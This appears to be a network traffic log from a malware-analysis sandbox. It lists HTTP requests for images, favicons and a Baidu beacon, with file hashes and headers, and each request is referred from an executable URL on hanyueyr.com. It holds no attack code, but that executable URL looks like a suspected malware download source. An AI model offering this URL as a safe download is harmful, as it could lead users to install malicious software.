Via: cache29.l2cn1823[43,304-0,H], cache34.l2cn1823[44,0], kunlun8.cn556[0,200-0,H], kunlun7.cn556[1,0]
Age: 923
Ali-Swift-Global-Savetime: 1545059233
X-Cache: HIT TCP_MEM_HIT dirn:0:597902888
X-Swift-SaveTime: Fri, 07 Jun 2019 13:52:23 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164661806517e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   11695
Md5:    a5f38e9f948e8a131a8e0c526375b41e
Sha1:   7888cd6e68511fe348956fd0b7223d461c0b29c1
Sha256: d84cc8306f8dfd9a840efedabb1fb9624bf27078338efcff9ea61948f3ad5c23
                                        
GET /uploads/8d162e736d7e41c2ee1e4607b324707a.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 590673
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:19:04 GMT
x-oss-request-id: 5CFA64479C44C92DEBD8E82C
Accept-Ranges: bytes
Etag: "E8BA1C465D31C88007788E600944CDE2"
Last-Modified: Tue, 04 Sep 2018 12:22:24 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 16593255345973110291
x-oss-storage-class: Standard
Content-MD5: 6LocRl0xyIAHeI5gCUTN4g==
x-oss-server-time: 5
Via: cache29.l2cm10-1[0,304-0,H], cache14.l2cm10-1[1,0], kunlun9.cn556[0,200-0,H], kunlun2.cn556[1,0]
Age: 2919
Ali-Swift-Global-Savetime: 1541123948
X-Cache: HIT TCP_MEM_HIT dirn:0:313235709
X-Swift-SaveTime: Fri, 07 Jun 2019 13:42:11 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72015599164630167635e


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 200
Size:   590673
Md5:    e8ba1c465d31c88007788e600944cde2
Sha1:   43d1d9a7f7e60b96d382c6c8f6377a8afb60ebf5
Sha256: 49b22c8da3f8cf0f0ff884ec350bd6804ac3434f15d41a148135badc352ef555
                                        
GET /uploads/bf973f0a4b671ea981776a3dd9bbcd6e.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 6907
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:29:12 GMT
x-oss-request-id: 5CFA66A86D3A651CD61A6719
Accept-Ranges: bytes
Etag: "8A7C6035BD7BED078E07B640CC70BEED"
Last-Modified: Fri, 07 Sep 2018 03:22:14 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10385171018139877979
x-oss-storage-class: Standard
Content-MD5: inxgNb177QeOB7ZAzHC+7Q==
x-oss-server-time: 4
Via: cache46.l2cn1819[0,304-0,H], cache29.l2cn1819[1,0], kunlun6.cn556[0,200-0,H], kunlun6.cn556[0,0]
Age: 2314
Ali-Swift-Global-Savetime: 1545059233
X-Cache: HIT TCP_MEM_HIT dirn:10:124506976
X-Swift-SaveTime: Fri, 07 Jun 2019 13:52:23 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72415599164664107929e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   6907
Md5:    8a7c6035bd7bed078e07b640cc70beed
Sha1:   7808e2102a1acccf2b8cbf1ae5cdde2b80831f8c
Sha256: 798ced32abe364a9962d9784a6d661a8eb2414ae133dcb530f8d3aedc490afa9
                                        
GET /uploads/8e0051b1bf75e40819628d0075200ff2.jpg HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: Tengine
Content-Length: 9891
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:03:25 GMT
x-oss-request-id: 5CFA609DB9D1322FBED8D3CE
Accept-Ranges: bytes
Etag: "657B00BA324258D9733FB707B7E05E54"
Last-Modified: Fri, 07 Sep 2018 03:24:46 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 6194287521172599493
x-oss-storage-class: Standard
Content-MD5: ZXsAujJCWNlzP7cHt+BeVA==
x-oss-server-time: 3
Via: cache8.l2cm10-1[0,304-0,H], cache10.l2cm10-1[1,0], kunlun3.cn556[0,200-0,H], kunlun7.cn556[1,0]
Age: 3861
Ali-Swift-Global-Savetime: 1545059234
X-Cache: HIT TCP_MEM_HIT dirn:11:99357733
X-Swift-SaveTime: Fri, 07 Jun 2019 13:18:04 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164664316591e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 82
Size:   9891
Md5:    657b00ba324258d9733fb707b7e05e54
Sha1:   938a86193c65ecc9bd2c23bf21abdefe43a829e6
Sha256: ca81437f9e67704918e9d9e493984c860b0627cc23f62e9dc26020d33b84d470
                                        
GET /uploads/60d14e326ed05fc74bce118383b41a49.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 6772
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:48:38 GMT
x-oss-request-id: 5CFA5D268F02BF068016AF77
Accept-Ranges: bytes
Etag: "A10FB34C3D19D2CA419E60C5BC112F5D"
Last-Modified: Fri, 07 Sep 2018 12:31:43 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 3351735236571350584
x-oss-storage-class: Standard
Content-MD5: oQ+zTD0Z0spBnmDFvBEvXQ==
x-oss-server-time: 19
Via: cache21.l2cn1823[0,304-0,H], cache17.l2cn1823[1,0], kunlun1.cn556[0,200-0,H], kunlun6.cn556[1,0]
Age: 4748
Ali-Swift-Global-Savetime: 1541064176
X-Cache: HIT TCP_MEM_HIT dirn:11:746951370
X-Swift-SaveTime: Fri, 07 Jun 2019 13:18:42 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72415599164666728028e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   6772
Md5:    a10fb34c3d19d2ca419e60c5bc112f5d
Sha1:   5e400853c57c1cebc23c553ade70225eed26b7b9
Sha256: 9f6d461b6a2ae58fe02f812f0ec511633d33c91d03158d0438cb86e5b744db74
                                        
GET /uploads/5706072a604e53ddcbdb6b0674cf0cf7.jpg HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: Tengine
Content-Length: 18790
Connection: keep-alive
Date: Fri, 07 Jun 2019 14:03:27 GMT
x-oss-request-id: 5CFA6EAFFC16A60BF4EE98BC
Accept-Ranges: bytes
Etag: "656E642AFA091190A3797C3591C3EC91"
Last-Modified: Fri, 07 Sep 2018 03:27:03 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 9409348041359055235
x-oss-storage-class: Standard
Content-MD5: ZW5kKvoJEZCjeXw1kcPskQ==
x-oss-server-time: 26
Via: cache28.l2cn1819[74,304-0,H], cache4.l2cn1819[75,0], kunlun10.cn556[0,200-0,H], kunlun7.cn556[1,0]
Age: 259
Ali-Swift-Global-Savetime: 1541071892
X-Cache: HIT TCP_MEM_HIT dirn:9:610182488
X-Swift-SaveTime: Fri, 07 Jun 2019 14:03:27 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164666846649e


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   18790
Md5:    656e642afa091190a3797c3591c3ec91
Sha1:   35f57db4673a7bae797748100137224e47ad4982
Sha256: 0a412950046ef8a12c053f22bc2036697c8ef5024ff0a0807a9b06264af0d5d4
                                        
GET /uploads/8026845999d10786d33513f69af41ecd.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 22666
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:54:27 GMT
x-oss-request-id: 5CFA6C9392441263C6AD303C
Accept-Ranges: bytes
Etag: "33EE66317D5A944237E884122DC44631"
Last-Modified: Fri, 07 Sep 2018 03:03:24 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 15613856957751770328
x-oss-storage-class: Standard
Content-MD5: M+5mMX1alEI36IQSLcRGMQ==
x-oss-server-time: 41
Via: cache10.l2cm10-1[0,304-0,H], cache37.l2cm10-1[1,0], kunlun1.cn556[0,200-0,H], kunlun7.cn556[1,0]
Age: 799
Ali-Swift-Global-Savetime: 1541069363
X-Cache: HIT TCP_MEM_HIT dirn:9:749912520
X-Swift-SaveTime: Fri, 07 Jun 2019 13:58:30 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72515599164669446744e


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 47
Size:   22666
Md5:    33ee66317d5a944237e884122dc44631
Sha1:   da722875dcead33a812ad8b6fb51df7a7192a0bf
Sha256: cbb4f0be5c542f3f4adb6688149190501fefb611fe39a6bb32959a7b770b1e3e
                                        
GET /uploads/bc7726a08d1638c0084f38a9c1260b7c.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 6820
Connection: keep-alive
Date: Fri, 07 Jun 2019 12:33:30 GMT
x-oss-request-id: 5CFA599A737FAA3D99CC9A5F
Accept-Ranges: bytes
Etag: "43848834C091DE064E0D81AD25A9B83F"
Last-Modified: Fri, 07 Sep 2018 12:42:45 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 14893995334942815339
x-oss-storage-class: Standard
Content-MD5: Q4SINMCR3gZODYGtJam4Pw==
x-oss-server-time: 31
Via: cache9.l2et2-1[0,304-0,H], cache29.l2et2-1[0,0], kunlun5.cn556[0,200-0,H], kunlun6.cn556[0,0]
Age: 5656
Ali-Swift-Global-Savetime: 1541071892
X-Cache: HIT TCP_MEM_HIT dirn:11:681481804
X-Swift-SaveTime: Fri, 07 Jun 2019 13:30:23 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72415599164669498130e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   6820
Md5:    43848834c091de064e0d81ad25a9b83f
Sha1:   f5d043f5065ba893adbd091752e42f99e2c4c00f
Sha256: be549cd9c0d16327a144767ee66ae16b1b457627ba0fd5d6fe11f51d45db19b1
                                        
GET /uploads/586d94a9dc228f8b846e961412601a73.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 6617
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:17:19 GMT
x-oss-request-id: 5CFA63DF08F4BE7DA72DFA25
Accept-Ranges: bytes
Etag: "4BC77902ED47B60F5984F98B9F94B858"
Last-Modified: Thu, 08 Nov 2018 02:58:34 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10743236587966305066
x-oss-storage-class: Standard
Content-MD5: S8d5Au1Htg9ZhPmLn5S4WA==
x-oss-server-time: 3
Via: cache45.l2cn1823[23,304-0,H], cache18.l2cn1823[24,0], kunlun2.cn556[0,200-0,H], kunlun8.cn556[1,0]
Age: 3032
Ali-Swift-Global-Savetime: 1541646983
X-Cache: HIT TCP_MEM_HIT dirn:11:684337031
X-Swift-SaveTime: Fri, 07 Jun 2019 13:17:19 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72615599164718017426e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   6617
Md5:    4bc77902ed47b60f5984f98b9f94b858
Sha1:   7d3111fcfc339e69ca9b7e508431f10137425bab
Sha256: 9ee41cf47e85df2af618a8c9111891bc5490b2c039c36c0e6b36fd064cd77934
                                        
GET /uploads/88b301d0931a5e4d7c16f82b2c12b962.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 178691
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:19:04 GMT
x-oss-request-id: 5CFA6448E595A5CC5003096F
Accept-Ranges: bytes
Etag: "E625E497430EFD909A544C4B4781A73D"
Last-Modified: Fri, 07 Sep 2018 03:05:21 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 12031608537852245322
x-oss-storage-class: Standard
Content-MD5: 5iXkl0MO/ZCaVExLR4GnPQ==
x-oss-server-time: 55
Via: cache39.l2cm10-1[0,304-0,H], cache13.l2cm10-1[9,0], kunlun8.cn556[0,200-0,H], kunlun5.cn556[0,0]
Age: 2925
Ali-Swift-Global-Savetime: 1541100737
X-Cache: HIT TCP_MEM_HIT dirn:9:563270305
X-Swift-SaveTime: Fri, 07 Jun 2019 13:46:06 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72315599164690406670e


--- Additional Info ---
Magic:  PNG image, 1000 x 140, 8-bit/color RGBA, non-interlaced
Size:   178691
Md5:    e625e497430efd909a544c4b4781a73d
Sha1:   b7f759e295cb4e699a597450c432a5b0dc3de436
Sha256: 76f742872774243815d9f97b4f7904100e458bac41a17607a287092e8ba58fac
                                        
GET /uploads/0321e4fdfb835b45aeed17a9f0642d11.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 6647
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:30:23 GMT
x-oss-request-id: 5CFA66EF0F5F0B68B371021F
Accept-Ranges: bytes
Etag: "27ADDACE4133F9E9B5618A852A27571C"
Last-Modified: Fri, 07 Sep 2018 12:33:40 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 15522829769205400301
x-oss-storage-class: Standard
Content-MD5: J63azkEz+em1YYqFKidXHA==
x-oss-server-time: 13
Via: cache10.l2cn1823[13,304-0,H], cache45.l2cn1823[14,0], kunlun6.cn556[0,200-0,H], kunlun2.cn556[1,0]
Age: 2250
Ali-Swift-Global-Savetime: 1541071892
X-Cache: HIT TCP_MEM_HIT dirn:11:95755579
X-Swift-SaveTime: Fri, 07 Jun 2019 13:30:23 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72015599164734443136e


--- Additional Info ---
Magic:  GIF image data, version 89a, 333 x 81
Size:   6647
Md5:    27addace4133f9e9b5618a852a27571c
Sha1:   fe4ae7211689f351b660786671aeef76a902cdc0
Sha256: 9b3cbf86c66bbf78dc1ab24b32fd4541d19896a7fa05e6539ff0d60b571d59d6
                                        
GET /uploads/c641e2bb9171cd41fb07cbfbdc46563d.gif HTTP/1.1
Host: img.jsyihaotong.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe

                                         
61.184.215.224
HTTP/1.1 200 OK
Content-Type: image/gif
Server: Tengine
Content-Length: 1747896
Connection: keep-alive
Date: Fri, 07 Jun 2019 13:01:57 GMT
x-oss-request-id: 5CFA60450F5F0B68B3449AED
Accept-Ranges: bytes
Etag: "C918685ECA63325C8926C1D460CBD618"
Last-Modified: Tue, 04 Sep 2018 11:49:56 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 10458178434129618827
x-oss-storage-class: Standard
Content-MD5: yRhoXspjMlyJJsHUYMvWGA==
x-oss-server-time: 44
Via: cache11.l2cn1823[0,304-0,H], cache9.l2cn1823[3,0], kunlun8.cn556[0,200-0,H], kunlun5.cn556[0,0]
Ali-Swift-Global-Savetime: 1548732625
Age: 3946
X-Cache: HIT TCP_MEM_HIT dirn:9:198169827
X-Swift-SaveTime: Fri, 07 Jun 2019 13:42:11 GMT
X-Swift-CacheTime: 3600
Timing-Allow-Origin: *
EagleId: 3db8d72315599164630994599e


--- Additional Info ---
Magic:  GIF image data, version 89a, 1000 x 200
Size:   1747896
Md5:    c918685eca63325c8926c1d460cbd618
Sha1:   60d7e8387f48a828f1d61e786355344fffa5f14a
Sha256: 92e4464b433add71c0cac1423e07b3f0b1052dcf9162d723d2e7b173c3ba0c3c
                                        
GET /favicon.ico HTTP/1.1
Host: www.hanyueyr.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __tins__18864699=%7B%22sid%22%3A%201559916458450%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201559918260724%7D; __51cke__=; __51laig__=4; __tins__18849991=%7B%22sid%22%3A%201559916458489%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201559918260740%7D; bdshare_firstime=1559916459841; Hm_lvt_d08ccb4fc69a8cc8f34331c26e3fbe5d=1559916461; Hm_lpvt_d08ccb4fc69a8cc8f34331c26e3fbe5d=1559916461

                                         
104.207.47.103
HTTP/1.1 200 OK
Content-Type: image/vnd.microsoft.icon
Server: nginx
Date: Fri, 07 Jun 2019 14:03:26 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.29


--- Additional Info ---
Magic:  UTF-8 Unicode text, with no line terminators
Size:   3
Md5:    ecaa88f7fa0bf610a5a26cf545dcd3aa
Sha1:   57218c316b6921e2cd61027a2387edc31a2d9471
Sha256: f1945cd6c19e56b3c1c78943ef5ec18116907a4ca1efc40a57d48ab1db7adfc5
                                        
GET /favicon.ico HTTP/1.1
Host: www.hanyueyr.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __tins__18864699=%7B%22sid%22%3A%201559916458450%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201559918260724%7D; __51cke__=; __51laig__=4; __tins__18849991=%7B%22sid%22%3A%201559916458489%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201559918260740%7D; bdshare_firstime=1559916459841; Hm_lvt_d08ccb4fc69a8cc8f34331c26e3fbe5d=1559916461; Hm_lpvt_d08ccb4fc69a8cc8f34331c26e3fbe5d=1559916461

                                         
104.207.47.103
HTTP/1.1 200 OK
Content-Type: image/vnd.microsoft.icon
Server: nginx
Date: Fri, 07 Jun 2019 14:03:29 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.29


--- Additional Info ---
Magic:  UTF-8 Unicode text, with no line terminators
Size:   3
Md5:    ecaa88f7fa0bf610a5a26cf545dcd3aa
Sha1:   57218c316b6921e2cd61027a2387edc31a2d9471
Sha256: f1945cd6c19e56b3c1c78943ef5ec18116907a4ca1efc40a57d48ab1db7adfc5
                                        
GET /v.gif?pid=307&type=3071&sc=1159,3908,1176,855&desturl=&apitype=1&linkid=jwm5zfp0uac&velo_load=0&velo_cssload=0&velo_jsLoad=819&cite_uid=0&cite_type=1&cite_mini=0 HTTP/1.1
Host: nsclick.baidu.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.hanyueyr.com/3eebaA_426_111.exe
Cookie: BAIDUID=FC1413AD38DC3A750CBF8113B67FF7BE:FG=1

                                         
115.239.211.92
HTTP/1.1 200 OK
Content-Type: image/gif
Accept-Ranges: bytes
Cache-Control: max-age=0
Content-Length: 0
Date: Fri, 07 Jun 2019 14:07:58 GMT
Etag: "4280832337"
Expires: Fri, 07 Jun 2019 14:07:58 GMT
Last-Modified: Fri, 23 Oct 2009 08:06:04 GMT
Pragma: no-cache
Server: BWS/1.0


--- Additional Info ---